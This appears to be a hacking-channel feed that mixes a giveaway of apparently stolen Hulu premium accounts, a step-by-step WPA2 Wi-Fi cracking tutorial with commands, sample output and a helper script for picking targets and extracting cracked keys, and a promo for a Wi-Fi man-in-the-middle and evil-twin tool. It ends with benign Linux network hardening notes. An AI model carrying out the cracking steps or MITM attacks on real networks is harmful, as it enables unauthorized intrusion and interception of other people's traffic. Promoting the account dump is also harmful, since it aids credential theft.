UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
🦑X56 HULU PREMIUM✅

> provide a screenshot after login to @Undercode_bot

pastebin.com/9HdcwYHN
🦑Practical hacking PDFs (new)
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑So you want to build your own tools?

That's great!


1) tabs: please use tabs instead of aligning code with spaces. Tabs are much more flexible when modifying code, are program independent (some programs strip spaces) and are more readable.

2) context: if you have settings or anything else you want to make available for later use, use the context array $_CONTEXT. It is an array, so make sure the key doesn't already exist; if you're not sure whether the key has been set, just dump the context array in your script:

> var_export($_CONTEXT);

3) paths: if you want shortcuts to (http) files you can add them to $_PATHS, which holds the paths (basically shortcuts) and is also an array. Again, if you add new items to this array, make sure they aren't already defined in your script:

> var_export($_PATHS);

4) buffer output: unless you are building a hacksuite app or using the hacksuite to feed your own application, you must buffer the output in $sCode until the script ends.

5) functions: use the functions in the Functions folder as much as possible rather than creating new ones.

6) folder consistency: always put new files into folders that make sense.

7) variable naming: you're not exactly forced to do this, but since most of the suite is coded like this it's recommended to follow the structure below.

> boolean: bSomeVar
string: sSomeVar
array: aSomeVar
integer: iSomeVar
double: dSomeVar
resource: rConnect
object: oSomeObject
object from selfmade class: cSomeObject

As you can see this makes the code more readable and you can tell right away what type the variable holds.

8) Protect include files: you also need to protect your include files from being requested directly. Do this by checking whether the constant IN_SCRIPT has been defined; the main script defines it before including anything, so a direct request for the include file exits before any of its code runs.

<?php
// Refuse to run unless we were included by the main script, which defines
// IN_SCRIPT before pulling this file in.
if (!defined('IN_SCRIPT')) {
    exit;
}

You can put this code at the start of all of your include files.

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack wifi topic article on git :

1) Cracking a Wi-Fi Network
Monitor Mode
Begin by listing wireless interfaces that support monitor mode with:

> airmon-ng

2) If you do not see an interface listed, then your wireless card does not support monitor mode.

3) This guide assumes your wireless interface is named wlan0; be sure to use the correct name if it differs. Next, place the interface into monitor mode:

> airmon-ng start wlan0

4) Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon). The commands below use mon0; substitute wlan0mon if that is the name airmon-ng reported.

5) Find Your Target

6) Start listening to 802.11 beacon frames broadcast by nearby wireless routers using your monitor interface:

airodump-ng mon0

7) You should see output similar to what is below.

CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

14:91:82:F7:52:EB  -66      205      26    0   1  54e  OPN              belkin.2e8.guests
14:91:82:F7:52:E8  -64      212      56    0   1  54e  WPA2 CCMP   PSK  belkin.2e8
14:22:DB:1A:DB:64  -81       44       7    0   1  54   WPA2 CCMP        <length: 0>
14:22:DB:1A:DB:66  -83       48       0    0   1  54e. WPA2 CCMP   PSK  steveserro

8) For the purposes of this demo, we will choose to crack the password of my network, "hackme". Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step. Only networks showing WPA or WPA2 under ENC yield a crackable handshake: an OPN network has no password to recover, and an ESSID shown as <length: 0> is a hidden network.

9) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airodump-ng to monitor traffic on the target network using the channel and bssid values discovered with the previous command.

# replace -c and --bssid values with the values of your target network
# (-c must be the CH airodump-ng showed for that BSSID; 6 for the ASUS network below)
# -w sets the prefix of the capture files airodump-ng writes
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0

CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]

BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

9C:5C:8E:C9:AB:C0  -47   0      140       0    0   6  54e  WPA2 CCMP   PSK  ASUS

11) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.


12) If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect by sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.

13) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. If the cracker later reports that the file contains no valid handshake, the capture caught only part of the exchange: run airodump-ng again and wait for another connection. I like to rename this file to reflect the network name we are trying to crack:

mv ./-01.cap hackme.cap

14) Crack the Network Password
The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.

15) Note that both attack methods below assume a relatively weak user-generated password. Most WPA/WPA2 routers come with strong 12-character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.

16) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.

> cap2hccapx.bin hackme.cap hackme.hccapx

Next, download and run naive-hashcat:

# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

17) Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

18) Where the last two fields separated by : are the network name and password respectively.

19) Note that hashcat 6.0 and later mark mode 2500 and the .hccapx format as deprecated in favour of mode 22000, which takes the .hc22000 format produced by hcxpcapngtool; with a current hashcat, convert the .cap with that tool and run hashcat with -m 22000 instead.

20) If you would like to use hashcat without naive-hashcat see this page for info.

21) Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:

# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Note that if the network password is not in the wordlist you will not crack the password.

# -a2 specifies WPA2, -b is the BSSID, -w is the wordlist
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap

If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.

Aircrack-ng 1.2 beta3


[00:01:49] 111040 keys tested (1017.96 k/s)


KEY FOUND! [ hacktheplanet ]


🦑Example continuation of the aircrack-ng output (master key, transient key and EAPOL HMAC derived from the recovered passphrase):

Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
             59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E

Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
                2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
                6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
                8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21

EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

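The tutorial above asks you to read the target's BSSID and channel off the airodump-ng screen and the passphrase out of the potfile by hand. The script below is an added example for this post, not code from the tutorial's author or from the aircrack-ng/hashcat projects: it pulls the BSSID/channel pair for an ESSID out of the CSV that airodump-ng writes next to its .cap when -w is used (prefix-01.csv), refusing OPN networks that have no handshake to capture, and pulls the recovered key for an ESSID out of a hashcat mode 2500 potfile. The file names and both file contents are constructed samples in the shape of those two formats.

```shell
#!/bin/sh
# Added example, not part of the original tutorial or of aircrack-ng/hashcat:
# look up a target's BSSID/channel in an airodump-ng CSV and the recovered
# key in a hashcat potfile. File names and contents below are constructed.

# Print "BSSID CHANNEL" for the WPA/WPA2 access point whose ESSID is $2 in the
# airodump-ng CSV $1. Fields are comma separated with padding spaces; only the
# access-point table is scanned, the "Station MAC" table below it is skipped.
# Exit status is 1 when the ESSID is absent or the network is not WPA (an OPN
# network has no handshake to capture).
wpa_target() {
    awk -F', *' -v want="$2" '
        /^Station MAC/ { exit }                       # end of the AP table
        NR > 1 && NF >= 14 && $14 == want && $6 ~ /WPA/ {
            print $1, $4; found = 1; exit
        }
        END { exit !found }
    ' "$1"
}

# Print the passphrase recovered for ESSID $2 from a hashcat mode 2500 potfile
# $1, whose lines look like hash:apmac:stamac:essid:passphrase. Everything from
# the fifth field onward is the passphrase, so a ':' inside it is preserved.
cracked_key() {
    awk -F: -v want="$2" '
        $4 == want {
            key = $5
            for (i = 6; i <= NF; i++) key = key ":" $i
            print key; found = 1; exit
        }
        END { exit !found }
    ' "$1"
}

# Constructed copies of the two file formats, written into directory $1.
write_samples() {
    cat > "$1/hackme-01.csv" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
14:91:82:F7:52:EB, 2017-07-23 15:48:10, 2017-07-23 15:49:02,  1,  54, OPN ,     ,    , -66,      205,       26,   0.  0.  0.  0,  17, belkin.2e8.guests, 
9C:5C:8E:C9:AB:C0, 2017-07-23 16:08:10, 2017-07-23 16:09:12,  6,  54, WPA2, CCMP, PSK, -47,      140,        0,   0.  0.  0.  0,   4, ASUS, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
BC:D3:C9:EF:D2:67, 2017-07-23 16:08:30, 2017-07-23 16:09:12, -51,       12, 9C:5C:8E:C9:AB:C0, ASUS
EOF
    cat > "$1/hackme.pot" <<'EOF'
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
0123456789abcdef0123456789abcdef:149182f752e8:bcd3c9efd267:guestnet:pass:word
EOF
}

demo_dir=$(mktemp -d)
write_samples "$demo_dir"
wpa_target "$demo_dir/hackme-01.csv" ASUS     # prints: 9C:5C:8E:C9:AB:C0 6
cracked_key "$demo_dir/hackme.pot" ASUS       # prints: hacktheplanet
rm -rf "$demo_dir"
```

On a real run you would point wpa_target at the -01.csv that airodump-ng wrote beside -01.cap and feed its two output values straight into the -c and --bssid options of the capture step; cracked_key reads the POT_FILE the naive-hashcat step produces. Both functions return a non-zero status when nothing matches, so they can be used as conditions in a longer script.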
@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑full wifi hacking from git sources
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack wifi git topic :
> WireSpy enables the automation of various WiFi attacks to conduct Man-in-the-Middle attacks (MITMAs).

🦑FEATURES :

1-Capture victims' traffic.
2-MAC address spoofing.
3-Set up honeypot and evil twin attacks.
4-Show the list of in range access points.
5-Wireless adapter|card|dongle power amplification.

🄸🄽🅂🅃🄰🄻🄻🄰🅃🄸🄾🄽 & 🅁🅄🄽

1) git clone https://github.com/aress31/wirespy

2) cd wirespy

3) $ chmod +x wirespy.sh

4) Run the script with root privileges:
$ sudo ./wirespy.sh

✅
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑Speed optimization: a detailed look at the configuration files used for tuning Linux network performance, by undercode:

1) In "Debugging Tools for Tuning Linux Network Performance" we introduced route, netstat and tcpdump, three network tuning and test tools, and what they can do. In this article we focus on the contents of the network configuration files to help you understand them.

/etc/modules.conf file

2) This configuration file defines the parameters of the modules that need to be loaded at startup. Here we are mainly concerned with the network card configuration. To reduce problems that may occur during startup, the Linux kernel does not automatically probe for multiple network cards. On a system where the network card driver is not compiled into the kernel but loaded dynamically as a module, installing more than one card requires the corresponding entries in "modules.conf". If the driver is a kernel module: for PCI devices the module probes all devices installed in the system by itself; for ISA cards you must give the module an IO address so it knows where to look for the card, and this information is provided in "/etc/conf.modules" (the older name of the same file).

3) For example, suppose we have two ISA-bus 3c509 cards, one at IO address 0x300 and the other at 0x320. Edit the "modules.conf" file as follows:

alias eth0 3c509
alias eth1 3c509
options 3c509 io=0x300,0x320



4) For PCI cards you only need the alias command to associate ethN with the appropriate driver module name; the IO address of a PCI card is detected automatically. For PCI cards, edit the "modules.conf" file as follows:

alias eth0 3c905
alias eth1 3c905



5) If the driver has been compiled into the kernel: the PCI probe at system startup automatically finds all related network cards. ISA cards can also be detected automatically, but in some cases an ISA card still needs the following configuration: add it to "/etc/lilo.conf", so that LILO passes the information to the kernel as boot parameters. For the ISA cards, edit the "lilo.conf" file and add:

append="ether=0,0,eth0 ether=0,0,eth1"



/etc/sysconfig/network-scripts/ifcfg-ethN file

6) In Red Hat, the configuration files for the system's network devices are kept in the "/etc/sysconfig/network-scripts" directory: ifcfg-eth0 holds the configuration of the first network card, ifcfg-eth1 that of the second, and so on. To change a network address by hand or to add a new network interface, modify the corresponding file (ifcfg-ethN) or create a new one.

DEVICE=name       name is the name of the physical device
IPADDR=addr       addr is the IP address assigned to the card
NETMASK=mask      mask is the network mask
NETWORK=addr      addr is the network address
BROADCAST=addr    addr is the broadcast address
ONBOOT=yes/no     whether to activate the card at boot
BOOTPROTO=proto   proto is one of:

none: no boot-time protocol is used (the static addresses above apply)

bootp: use the BOOTP protocol

dhcp: use the DHCP protocol

USERCTL=yes/no    whether non-root users may control (bring up or down) the device

/etc/resolv.conf file

7) This file is the configuration file of the domain name resolver (the library that turns host names into IP addresses). An example:

search domainname.com
nameserver 208.164.186.1
nameserver 208.164.186.2



8) "search domainname.com" means that when a host name without a full domain name is given, the suffix domainname.com is appended to it; "nameserver" names the host that is queried as the domain name server when resolving a name. Name servers are queried in the order they appear in the file.

/etc/host.conf file
9) This file specifies how host names are resolved. Linux uses the resolver library to obtain the IP address matching a host name. An example "/etc/host.conf":

order bind, hosts
multi on
nospoof on



10) "order bind, hosts" sets the lookup order for host names: here DNS is used first to resolve the name, and then the "/etc/hosts" file is queried (or the other way round if the two are swapped).

"multi on" specifies that a host listed in the "/etc/hosts" file may have several addresses; hosts with several IP addresses are called multi-homed hosts.

"nospoof on" means that IP address spoofing of the server is not tolerated: after resolving a name the resolver looks up the returned address in reverse and rejects the answer if the two do not agree. IP spoofing is a means of attacking the security of a system, by passing off one's IP address as that of another computer to gain its trust.

/etc/hosts file

11) When the machine starts, before DNS can be queried, it needs some host name to IP address mappings. These are stored in the /etc/hosts file. Without a domain name server, every network program on the system resolves host names by querying this file.

The following is an example "/etc/hosts" file:

IP Address      Hostname            Alias
127.0.0.1       Localhost           Gate.openarch.com
208.164.186.1   gate.openarch.com   Gate
..........................................



The leftmost column is the host's IP address, the middle column the host name, and any further columns are aliases for that host. Once the machine's network configuration files are set up, restart the network for the changes to take effect: /etc/rc.d/init.d/network restart.

/etc/inetd.conf file

12) As is well known, the more service ports a server opens, the harder it is to guarantee the security and stability of the system. A server that provides a specific service should therefore open only the ports that service needs and close everything unrelated. For example, a machine that is a www and ftp server should only open ports 80 and 21, and unrelated services such as finger and auth should be turned off to reduce the system's exposure.

13) Inetd, also called the "super server", is a daemon that listens for network requests and starts the matching service process to handle each connection. inetd.conf is its configuration file: it tells inetd which network ports to listen on and which service to start for each port. When using Linux in any networked environment, the first thing to do is to work out which services the server is meant to provide. Services that are not needed should be disabled, and preferably uninstalled, so that attackers have fewer openings. Check "/etc/inetd.conf" to see what services inetd provides, disable every unnecessary one by commenting out its line (a # at the start of the line), and then send a SIGHUP signal to the inetd process:

Step 1: Change the file permissions to 600.

[root@deep]# chmod 600 /etc/inetd.conf



Step 2: Make sure that the owner of the file is root.

[root@deep]# stat /etc/inetd.conf



Step 3: Edit the "inetd.conf" file (vi /etc/inetd.conf) to disable all unnecessary services, such as: ftp, telnet, shell, login, exec, talk, ntalk, imap, pop-2, pop-3, finger, auth, etc. If you think certain services are useful, you need not disable them.

Step 4: After changing the "inetd.conf" file, don't forget to send a SIGHUP signal (killall -HUP inetd) to the inetd process.

[root@deep /root]# killall -HUP inetd



Step 5: To protect the "inetd.conf" file, you can use the chattr command to make it immutable:

[root@deep]# chattr +i /etc/inetd.conf

A file with the "i" attribute cannot be modified: it cannot be deleted or renamed, no link can be created to it and no data can be written to it. Only the superuser can set or clear this attribute. To change inetd.conf later, first clear the immutable flag:

[root@deep]# chattr -i /etc/inetd.conf



Services such as sendmail, named and www are different from finger, telnet and the like: they are not started by inetd when a request arrives but run as standalone daemons from system startup. Red Hat Linux provides the linuxconf command, which lets you interactively set under a graphical interface which services run at startup. You can also do this from the command line, for example: [root@deep]# chkconfig --level 35 named off.

/etc/hosts.allow file

However, shutting down telnet, ftp and similar services altogether is very inconvenient for an administrator who needs remote management. Linux provides a more flexible and effective way to restrict who may use a service, so that trusted users keep access while security is maintained: a program called TCP wrappers, installed by default in most distributions. With TCP wrappers you can restrict access to the services mentioned above, and it logs every accepted or refused connection through syslog, so by reading those logs the administrator can see who connected or tried to connect.

The two files hosts.allow and hosts.deny in the /etc directory control this; by configuring them you specify which machines may use these services and which may not. Each line has the form daemon_list : client_list. hosts.allow is consulted first and a match there grants access; otherwise hosts.deny is consulted and a match there refuses it; a connection matching neither file is allowed, so a hosts.deny without a final ALL : ALL line denies nothing.

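The order in which tcpd reads the two files decides whether a policy is really closed, and the default-permit when nothing matches is the usual mistake. The script below is an added example for this post, not code from the article's author or from the TCP wrappers package: it emulates that decision for a daemon/client pair against a constructed hosts.allow and hosts.deny, supporting only the ALL keyword, exact addresses and trailing-dot network prefixes such as 192.168.1. (hostnames, EXCEPT and the option field of a real rule are not handled), which is enough to check the precedence before editing the real files.

```shell
#!/bin/sh
# Added example, not part of the original article or of TCP wrappers: a small
# emulation of tcpd's access decision. hosts.allow match grants, otherwise
# hosts.deny match refuses, otherwise the connection is granted. Only ALL,
# exact addresses and trailing-dot prefixes are supported; file contents are
# constructed samples.

# Return 0 when the (daemon $2, client $3) pair matches a rule in file $1.
# Rule layout: daemon_list : client_list [: options]; lists are separated by
# commas and/or blanks; blank lines and '#' comments are skipped.
rule_matches() {
    awk -F: -v daemon="$2" -v client="$3" '
        function in_list(list, want,    n, i, pat, items) {
            n = split(list, items, "[,[:space:]]+")
            for (i = 1; i <= n; i++) {
                pat = items[i]
                if (pat == "") continue
                if (pat == "ALL" || pat == want) return 1
                # a pattern ending in "." is a network prefix
                if (pat ~ /\.$/ && index(want, pat) == 1) return 1
            }
            return 0
        }
        /^[[:space:]]*(#|$)/ { next }
        NF >= 2 && in_list($1, daemon) && in_list($2, client) { hit = 1; exit }
        END { exit !hit }
    ' "$1"
}

# Print allow or deny for daemon $3 from client $4, given hosts.allow $1 and
# hosts.deny $2, in tcpd's order.
hosts_access() {
    if rule_matches "$1" "$3" "$4"; then
        echo allow
    elif rule_matches "$2" "$3" "$4"; then
        echo deny
    else
        echo allow          # no rule matched: tcpd's default is to grant
    fi
}

# Constructed policy: admin LAN may use telnet and ftp, ssh from the whole
# 192.168.x.x range plus one host, everything else from anywhere refused.
write_wrapper_samples() {
    cat > "$1/hosts.allow" <<'EOF'
# daemon_list : client_list
in.telnetd, in.ftpd : 192.168.1.
sshd : 192.168., 10.0.0.5
EOF
    cat > "$1/hosts.deny" <<'EOF'
ALL : ALL
EOF
    : > "$1/hosts.deny.empty"     # a missing or empty hosts.deny refuses nothing
}

demo_dir=$(mktemp -d)
write_wrapper_samples "$demo_dir"
a=$demo_dir/hosts.allow; d=$demo_dir/hosts.deny
hosts_access "$a" "$d" in.telnetd 192.168.1.20    # allow
hosts_access "$a" "$d" in.telnetd 203.0.113.7     # deny
hosts_access "$a" "$d" in.fingerd 192.168.1.20    # deny: not in hosts.allow, ALL : ALL in hosts.deny
hosts_access "$a" "$demo_dir/hosts.deny.empty" in.fingerd 192.168.1.20   # allow: no deny rule at all
rm -rf "$demo_dir"
```

The last call is the point to take away: with the same hosts.allow but an empty hosts.deny, finger from the LAN is let through, because tcpd grants anything that matches neither file. Keep ALL : ALL in hosts.deny and list only what you trust in hosts.allow.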
/etc/services file

The correspondence between port numbers and standard services was defined in RFC 1700 "Assigned Numbers" (since superseded by the IANA port number registry). The "/etc/services" file lets server and client programs translate a service name into a port number. The table exists on every host under the name "/etc/services". Only "root" may modify it, and under normal circumstances it need not be modified, since it already contains the port numbers of the commonly used services. To improve security we can protect this file against unauthorised deletion and change with the following command:

[root@deep]# chattr +i /etc/services



/etc/securetty file

The "/etc/securetty" file lets you specify from which TTY devices the "root" user may log in. The login program (usually "/bin/login") reads "/etc/securetty"; its format is one tty device per line, and root may log in only on the devices listed. A device that is commented out or absent from the file does not allow root login.

/etc/inittab file

Comment out one line in this file to stop Control-Alt-Delete from rebooting the computer. If the server is not in a physically secure location, this matters.

Edit the inittab file (vi /etc/inittab) and change this line:

ca::ctrlaltdel:/sbin/shutdown -t3 -r now



to:

#ca::ctrlaltdel:/sbin/shutdown -t3 -r now



Use the following command to make the change take effect:

[root@deep]# /sbin/init q



/etc/rc.d/init.d/

The scripts under /etc/rc.d/init.d/ mainly start and stop services. Ordinary users have no need to read them, so their permissions should be tightened:

[root@deep]# chmod -R 700 /etc/rc.d/init.d/*



This way only root can read, write and execute the scripts in this directory.

written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁